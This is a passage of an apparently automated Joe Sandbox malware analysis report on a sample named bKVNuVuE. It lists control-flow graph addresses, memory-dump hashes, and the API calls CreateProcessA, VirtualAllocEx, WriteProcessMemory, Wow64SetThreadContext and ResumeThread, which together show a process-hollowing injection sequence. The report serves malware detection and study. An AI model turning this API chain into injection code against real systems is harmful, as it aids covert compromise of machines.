2153b5 1077->1085 1086 2153ad 1078->1086 1083->1057 1084->1086 1085->1044 1085->1047 1085->1050 1085->1052 1085->1054 1086->1077 1089 215326-215352 call 210e64 call 214b54 1089->1041 1111 215358 1089->1111 1092 2154fd-21550c 1092->1041 1100 215512 1092->1100 1095->1064 1096->1095 1098->1047 1099->1098 1100->1049 1105->1086 1111->1111 1113->1051 1114->1089 1115->1089 1116->1089 1117->1073 1118->1073 1119->1061 1120->1061 1121->1092 1122->1092
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pT!
                                      • API String ID: 0-2144713336
                                      • Opcode ID: 05903d6b645a03750c6958d51e292229e2ad2af1ec59f5e9ef838c8de2199ec7
                                      • Instruction ID: 6f9243f50a9486218897ca67f170dafaca0afbe85d5e161cb8032ca28f654f48
                                      • Opcode Fuzzy Hash: 05903d6b645a03750c6958d51e292229e2ad2af1ec59f5e9ef838c8de2199ec7
                                      • Instruction Fuzzy Hash: 0B517B38720A15DFDB249F68D8587AD77F2EFE8342F2444A9E406D73A5CAB08C95CB41

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1123 2154c4 1124 2154c5-2154d2 1123->1124 1126 215161-215164 1124->1126 1127 21516a 1126->1127 1128 21535d-215390 call 210e54 1126->1128 1127->1124 1127->1128 1129 2153d0-21540a 1127->1129 1130 215254-21525d 1127->1130 1131 215394-215410 1127->1131 1132 2154d7-2154da 1127->1132 1133 215517-215520 1127->1133 1134 2154b9 1127->1134 1135 21530a-215311 1127->1135 1136 21543a-215453 1127->1136 1137 21528c-2152ff 1127->1137 1138 2153bc-2153ce 1127->1138 1181 215371 1128->1181 1182 215392 1128->1182 1160 2153b0-2153b3 1129->1160 1188 21540c 1129->1188 1200 21525f call a61638 1130->1200 1201 21525f call a61648 1130->1201 1157 215412-21541b 1131->1157 1158 21541f-215421 1131->1158 1204 2154dd call a60d88 1132->1204 1205 2154dd call a60d78 1132->1205 1159 215522 1133->1159 1134->1124 1141 215314-21531e 1135->1141 1146 215455-215469 1136->1146 1147 21546d 1136->1147 1137->1126 1196 215305 1137->1196 1138->1129 1152 215423-21542f 1138->1152 1197 215320 call 215681 1141->1197 1198 215320 call 215581 1141->1198 1199 215320 call 215560 1141->1199 1144 2154e3-2154f5 1202 2154f7 call a60fc8 1144->1202 1203 2154f7 call a60fb9 1144->1203 1178 215457 1146->1178 1179 21546b 1146->1179 1147->1134 1152->1160 1161 215435 1152->1161 1156 215265-215271 1156->1126 1166 215277-215287 1156->1166 1157->1160 1167 21541d 1157->1167 1158->1129 1158->1152 1159->1159 1160->1138 1168 2153b5 1160->1168 1169 2153ad 1161->1169 1166->1141 1167->1169 1168->1129 1168->1131 1168->1134 1168->1136 1168->1138 1169->1160 1172 215326-215352 call 210e64 call 214b54 1172->1126 1194 215358 1172->1194 1175 2154fd-21550c 1175->1126 1183 215512 1175->1183 1178->1147 1179->1178 1181->1131 1182->1181 1183->1133 1188->1169 1194->1194 1196->1135 1197->1172 1198->1172 1199->1172 1200->1156 1201->1156 1202->1175 1203->1175 1204->1144 1205->1144
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep$pT!
                                      • API String ID: 0-2144713336
                                      • Opcode ID: a7e90029349ac31df84d3ac1b47af424062a7cabb57664a5da3de1ab705966cc
                                      • Instruction ID: 5cc82a60a77dba49374eccf3c42ea1fbfffce8c09ebe64f621d80dda53a83d39
                                      • Opcode Fuzzy Hash: a7e90029349ac31df84d3ac1b47af424062a7cabb57664a5da3de1ab705966cc
                                      • Instruction Fuzzy Hash: 6E517C38720A15DFDB249F68D8587AD77F2EFE8342F2444A9E406C73A5CAB08C95CB41
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: P}6${
                                      • API String ID: 0-557245861
                                      • Opcode ID: 24b5e0f7ca7ed5958ad10e05e2946f83c689afd36768f3dde420ee6c04dee2f9
                                      • Instruction ID: ee3ad2c267f5fb8cc8fd76848834e005d625518bc434ead02b68c1ffa312cebe
                                      • Opcode Fuzzy Hash: 24b5e0f7ca7ed5958ad10e05e2946f83c689afd36768f3dde420ee6c04dee2f9
                                      • Instruction Fuzzy Hash: 4941C270A24355CFC714DF68D4A4AEDBBF2AF99310F2485A6D146AB292C7B0DCD0CB91
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A69ADF
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 359c26a6f2f05fe9e71c2bc8c5431a7471087dd58dab9a60c4ce6c7c5571bb61
                                      • Instruction ID: 654536a3a1f0cf6b30fb79a1ddf0989bfe17f2b7c63dff331fd25069d029d0bc
                                      • Opcode Fuzzy Hash: 359c26a6f2f05fe9e71c2bc8c5431a7471087dd58dab9a60c4ce6c7c5571bb61
                                      • Instruction Fuzzy Hash: 45C12771D002598FDF24CFA8C841BEEBBB5BF09304F0091AAD859B7250DB749A85CF95
                                      APIs
                                      • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00A69ADF
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: CreateProcess
                                      • String ID:
                                      • API String ID: 963392458-0
                                      • Opcode ID: 070ee0d8680d5b520e2078144d33a66144bbf114897d5deb9006722a3b72a340
                                      • Instruction ID: 1d6a0944ca14394825f8b8821da30eae2bb2ac220b839c8ec86ec74b27e911f9
                                      • Opcode Fuzzy Hash: 070ee0d8680d5b520e2078144d33a66144bbf114897d5deb9006722a3b72a340
                                      • Instruction Fuzzy Hash: A5C12671D002198FDF24DFA8C841BEEBBB5BF09314F0091AAD859B7250DB749A85CF95
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A69553
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: 20656386017efa18d1d8e16ed0d663e49f7ca7efda198ca5941633bd3a890ece
                                      • Instruction ID: f1441992f84d77fe81203e7008d4fb2014c5d956a848505c40ada44459e944f4
                                      • Opcode Fuzzy Hash: 20656386017efa18d1d8e16ed0d663e49f7ca7efda198ca5941633bd3a890ece
                                      • Instruction Fuzzy Hash: D641AAB5D002589FCF00CFA9D984AEEFBF1BB49314F24942AE815BB250D734AA45CF64
                                      APIs
                                      • WriteProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A69553
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: MemoryProcessWrite
                                      • String ID:
                                      • API String ID: 3559483778-0
                                      • Opcode ID: f906f73957bf12ef66e5c3c64807bb18d92b143036421f3160bac616c22fa2ed
                                      • Instruction ID: 40e1e722d15d8e4b5e26a1b2114b2aa39bf629d00a9936a162eb3494bec068c6
                                      • Opcode Fuzzy Hash: f906f73957bf12ef66e5c3c64807bb18d92b143036421f3160bac616c22fa2ed
                                      • Instruction Fuzzy Hash: 5841AAB4D002489FCF00CFA9D984AEEFBF1BB49314F20942AE819B7250D734AA45CF64
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A69692
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: e210688c8e2fe174cd7ffa7ad9684e4fb39a3f900c68f67dc0d2fec5655b71cd
                                      • Instruction ID: c7517ba645c23b197d133590d9bff415e07fdcfa577addb11df74bb8553ac567
                                      • Opcode Fuzzy Hash: e210688c8e2fe174cd7ffa7ad9684e4fb39a3f900c68f67dc0d2fec5655b71cd
                                      • Instruction Fuzzy Hash: 1A41BAB8D002589FCF10CFA9D984AEEFBB5BF49310F20942AE814B7250D774A955CF64
                                      APIs
                                      • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 00A69692
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: MemoryProcessRead
                                      • String ID:
                                      • API String ID: 1726664587-0
                                      • Opcode ID: b3ae7fd956810e00e4618274ffd169b5ad6f9b4c74821f6c9fc2e1198433f762
                                      • Instruction ID: 4af2a61a3033b139e9870a2dbbc3e59d4ac6b558b00f8892aef6513dd1383338
                                      • Opcode Fuzzy Hash: b3ae7fd956810e00e4618274ffd169b5ad6f9b4c74821f6c9fc2e1198433f762
                                      • Instruction Fuzzy Hash: BC41A9B9D002589FCF10CFAAD984AEEFBB5BF49310F20942AE814B7240D775A955CF64
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00A69402
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 462f079af9364579d84f82973f1e2b9a411746f70ac478c633a0b7e7e0045f29
                                      • Instruction ID: e3c3c76b1ae2434c3aacb86cbc933022084030ec932c7ad755db642f4f124eee
                                      • Opcode Fuzzy Hash: 462f079af9364579d84f82973f1e2b9a411746f70ac478c633a0b7e7e0045f29
                                      • Instruction Fuzzy Hash: F0418AB4D002589FCF10CFA9D984AAEFBB5BF49310F10942AE814B7350D735A956CF65
                                      APIs
                                      • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 00A69402
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 2d8cb0cd858e86c70965d63cea326a50b95bee0a440f6643949816451f3c7337
                                      • Instruction ID: dd87a7e88ff2956ad27251ef554eb2b48293b0f9e8dc119fc88ba341ba1c1886
                                      • Opcode Fuzzy Hash: 2d8cb0cd858e86c70965d63cea326a50b95bee0a440f6643949816451f3c7337
                                      • Instruction Fuzzy Hash: 6B4198B8D002589FCF10CFA9D984AEEFBB5BB49310F20942AE814B7310D735A946CF65
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00A692D7
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 69a57939fa35f941605b291cc04b27c66c7c317d4182242d796508fb78b4bc21
                                      • Instruction ID: ca01e0351a5a3bde7fe8bc295f1d1d4127c86d3c98b23f2e332d9745c157f952
                                      • Opcode Fuzzy Hash: 69a57939fa35f941605b291cc04b27c66c7c317d4182242d796508fb78b4bc21
                                      • Instruction Fuzzy Hash: B541ACB4D002589FCB10DFAAD984AEEFBF5AF49314F24942AE414B7240D778A945CF64
                                      APIs
                                      • Wow64SetThreadContext.KERNEL32(?,?), ref: 00A692D7
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: ContextThreadWow64
                                      • String ID:
                                      • API String ID: 983334009-0
                                      • Opcode ID: 5fa1ad4ab8f7e13fbbab46581c8590e03ffa6b3f97e16d3347939852a9857159
                                      • Instruction ID: fc169ff086f2807036b21130ac2231a63cd7809876fb3e2dcbdfc831e99fa674
                                      • Opcode Fuzzy Hash: 5fa1ad4ab8f7e13fbbab46581c8590e03ffa6b3f97e16d3347939852a9857159
                                      • Instruction Fuzzy Hash: AB41ACB4D002589FCF10CFAAD884AEEFBB5AF49314F24842AE414B7240D738A949CF54
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 0135afdf49316f9a2d7bcf502773104f2b63e3dddbe23e34313d641d5f7346ae
                                      • Instruction ID: a6243d4b09c330ec7b5725781d413efa33de0105c381b258db99bd2488e43f81
                                      • Opcode Fuzzy Hash: 0135afdf49316f9a2d7bcf502773104f2b63e3dddbe23e34313d641d5f7346ae
                                      • Instruction Fuzzy Hash: 9D31CAB4D002199FCF10CFA9D984AAEFBB5EF49314F20942AE815B7340D735A905CFA4
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.477720758.0000000000A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A60000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_a60000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID: ResumeThread
                                      • String ID:
                                      • API String ID: 947044025-0
                                      • Opcode ID: 313da3664c01a8bf887c93cd4ab85effab8105cfce069106b5e5dea689a7fc19
                                      • Instruction ID: 8073cf0e464d8dc7ef08fa756d897ade660942a4630608ecb5291307233cf151
                                      • Opcode Fuzzy Hash: 313da3664c01a8bf887c93cd4ab85effab8105cfce069106b5e5dea689a7fc19
                                      • Instruction Fuzzy Hash: DD31BAB4D002199FCF10CFA9D984AEEFBB5AF49314F24942AE819B7300D735A905CFA4
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: Tep
                                      • API String ID: 0-914316021
                                      • Opcode ID: da3b7e0de2fcccdb7d908bc3cfa4a236daa343960ae73ca7dd593938e4426ab6
                                      • Instruction ID: 462871b840bc5e1915c9135f8de5395132b185f62ca77c08e5263d508d772888
                                      • Opcode Fuzzy Hash: da3b7e0de2fcccdb7d908bc3cfa4a236daa343960ae73ca7dd593938e4426ab6
                                      • Instruction Fuzzy Hash: 5D01F730B381509FCB299BB888A87EE7EE25FD4300F1544ADA4079B381CDB44C56D751
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: R
                                      • API String ID: 0-1466425173
                                      • Opcode ID: 6f3f060dd96dcf96a40b7d679daf88784db40b8911e3011392115a8ee6aa5154
                                      • Instruction ID: 31ae29fdf9adc964084ed5203c7bd130749a99814aca1cd4871bec4e113cb64c
                                      • Opcode Fuzzy Hash: 6f3f060dd96dcf96a40b7d679daf88784db40b8911e3011392115a8ee6aa5154
                                      • Instruction Fuzzy Hash: F4F0273530CB809FC3175B306C1849E3FB9AF63285B0A42DBE845C73A7DE68480B8B45
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 9fe6438f12b25ccf463d4730e27184cee8c464f10be3e188b83e05a8b4fff7c1
                                      • Instruction ID: 3742243af4c5d6714f9c5e57c597be5aeee00f0c6c72454ee2466d556cba88ce
                                      • Opcode Fuzzy Hash: 9fe6438f12b25ccf463d4730e27184cee8c464f10be3e188b83e05a8b4fff7c1
                                      • Instruction Fuzzy Hash: 8B317A74A10208DFC715EFA8C585A9DBBF2AF61304F4585DAD0199F222DB70DEE48F86
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d71c40b011a33d6e9e1dd09fbea72855151ea96acd7ae6ecd98b0c07bef0d85d
                                      • Instruction ID: e9e274a7479a63d0b40d4427f233cce2192b194cfdc4da329a3c942b0aa07389
                                      • Opcode Fuzzy Hash: d71c40b011a33d6e9e1dd09fbea72855151ea96acd7ae6ecd98b0c07bef0d85d
                                      • Instruction Fuzzy Hash: F1419A70A21209EFCB44CF99D9888AEFBF1FF99300B21D896C405A7368D730DA61DB40
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476789195.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_1cd000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 73422e038d2d0e4f5e722b536799c2fee7eedd662e0fb64731330d9af40bf056
                                      • Instruction ID: 2446ae9d3a612b1c349afd3d13331e462045d33a89eee71fd6583663ff162417
                                      • Opcode Fuzzy Hash: 73422e038d2d0e4f5e722b536799c2fee7eedd662e0fb64731330d9af40bf056
                                      • Instruction Fuzzy Hash: 2F21AF75604240AFDB15CF18E884F26BBA5EB94314F24C5BDE84A4B246C736D857CBA2
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476789195.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_1cd000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e8e7576125b332b313445a00ccad6ad941a2c85a52c7cd0d0395cdfde5acf226
                                      • Instruction ID: 7f5c60fc1ccf10a8a87b707d8ed240768f809aa2b8ba845b7090dc1bfa32b1fe
                                      • Opcode Fuzzy Hash: e8e7576125b332b313445a00ccad6ad941a2c85a52c7cd0d0395cdfde5acf226
                                      • Instruction Fuzzy Hash: 1A21FFB1604240EFDB06CF14E9C0F26BBA1FB94314F24C6BDE8494B246C336D84ACB61
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476789195.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_1cd000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2049c9f2fcaa8303ed86d1b6b569958068252656f0d092f716e8843d05b4d183
                                      • Instruction ID: 40243f35f3ee0dc20529e0be10ecde11bb68e2a8f454aea6b0cfb4c186990162
                                      • Opcode Fuzzy Hash: 2049c9f2fcaa8303ed86d1b6b569958068252656f0d092f716e8843d05b4d183
                                      • Instruction Fuzzy Hash: 4C2180755083809FDB02CF14D994B15BF71EB56314F28C5EAD8498F267C33AD85ACB62
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b0742ffc3f5b0a55e235f2e666d288f7920680170c40ced660e59cd3c07bb862
                                      • Instruction ID: 48d6ba372b54d2b0475b3f716b158b0fa53dea93380a1fa0e2d215fd8fb07dad
                                      • Opcode Fuzzy Hash: b0742ffc3f5b0a55e235f2e666d288f7920680170c40ced660e59cd3c07bb862
                                      • Instruction Fuzzy Hash: 5A110A38E14108EFCB44DFA9C985AAEFBF2EF98300F25C4AAD41897365D730DA518B40
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476789195.00000000001CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 001CD000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_1cd000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction ID: 957bfd6d956499c6061681bc86fe1e1f1defdecf5ea5ad5fccd6a5237950cdd7
                                      • Opcode Fuzzy Hash: cf97df7c3807292c182f1b7c3dfb3e406c11d3bc6a6cd3de1006cfbaae9c3a26
                                      • Instruction Fuzzy Hash: 32119D75904280DFDB12CF14D9C4B15FFA1FB94314F28C6AED8494B656C33AD84ACBA2
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 68b72c06e42860ef6d8c2a89cef97034831140ae2ccea89b273c231614d7a261
                                      • Instruction ID: 80f2497811a6e32a9a763854b0c064752f177ed018dd8755b0bed9938a85dca9
                                      • Opcode Fuzzy Hash: 68b72c06e42860ef6d8c2a89cef97034831140ae2ccea89b273c231614d7a261
                                      • Instruction Fuzzy Hash: 1301E130919388EFCB02EB68D8566DCBBB1EF41304B6585DAC5488B623D6309E59CB81
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 1ad7ae2e140884419b37adb161ad90533635b7763c8b2f5867bdc577fa788183
                                      • Instruction ID: 43511583611c1a3ede2061d72f5f11140579967e7430a640efff61f54aa6dc01
                                      • Opcode Fuzzy Hash: 1ad7ae2e140884419b37adb161ad90533635b7763c8b2f5867bdc577fa788183
                                      • Instruction Fuzzy Hash: A5114871D042499FCB06EFB8C9516DEBFB1EF89300F1489EAC055AB356EA748A058F81
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 40e09fe9c13532ea967d34222d4166e6e19bab53b5dfdfc043d1e8bbf9875c08
                                      • Instruction ID: d936ff4717d1d1a26bcc65a2c9a81eaa110b1472899126d35a54b131ba5d0732
                                      • Opcode Fuzzy Hash: 40e09fe9c13532ea967d34222d4166e6e19bab53b5dfdfc043d1e8bbf9875c08
                                      • Instruction Fuzzy Hash: 6201E571D0020DAFCB45EFE8C9516DEFFB1EF88300F1089AAD015AB355EA709A459B81
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 64d2c95bfce3b75cf20962da3eb3440797a28a6d7800bee5989cd88d3a32235f
                                      • Instruction ID: 5225af2ffdb1875c5bfc1ccf1c673485ef1193ec8e77dcf07f473c94e75f6100
                                      • Opcode Fuzzy Hash: 64d2c95bfce3b75cf20962da3eb3440797a28a6d7800bee5989cd88d3a32235f
                                      • Instruction Fuzzy Hash: D7018130520754DBCB25AB38C8403EDB7B3AFE1340F504A5CD10A1B241DFB49AEA8BA2
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: cc6bb04fbbb767830a7750d352958e2c61845dd29d7db171cb5cd3a805faa9cc
                                      • Instruction ID: e87de0a84c11cf0f9405095737a0021d212ad6acba7dbb802cfdb39a59d8cfbb
                                      • Opcode Fuzzy Hash: cc6bb04fbbb767830a7750d352958e2c61845dd29d7db171cb5cd3a805faa9cc
                                      • Instruction Fuzzy Hash: C3D02B21519B941BC31B623918210C57BCA4F9660074644A7E44C8B113D8440D9686D9
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 818afb3ced10816506c31de8d1e4f05e30733720556e44e2c23b46f5125f465c
                                      • Instruction ID: a3d81b5ba84502a5f5ed30b0c3572a01bf3c01b13993ed5cd7ec6dbecd6d1f29
                                      • Opcode Fuzzy Hash: 818afb3ced10816506c31de8d1e4f05e30733720556e44e2c23b46f5125f465c
                                      • Instruction Fuzzy Hash: 68E0C239310A109FC7246B30BC1446E7FAABFEA29131582AEFC07C3714DE7588038B49
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f8f5a82cecf22e2d9b93c2d32dfe7650abfce303213e116dc66b1b9beb244c03
                                      • Instruction ID: 8464c6b27c7543d1b75097e31049cfa795dd3f8f4ac2338e58d090b02755b650
                                      • Opcode Fuzzy Hash: f8f5a82cecf22e2d9b93c2d32dfe7650abfce303213e116dc66b1b9beb244c03
                                      • Instruction Fuzzy Hash: 1AD01270A1534CFBCB01EFB8D94699D77B5DF44308B9145A9E40897202DA71AF459B81
                                      Memory Dump Source
                                      • Source File: 00000013.00000002.476866338.0000000000210000.00000040.00000800.00020000.00000000.sdmp, Offset: 00210000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_19_2_210000_bKVNuVuE.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 59f917cb7c93a1d43cf6b30de177fcb4d23e3fde06a377e5ebd2c3f98f0e9256
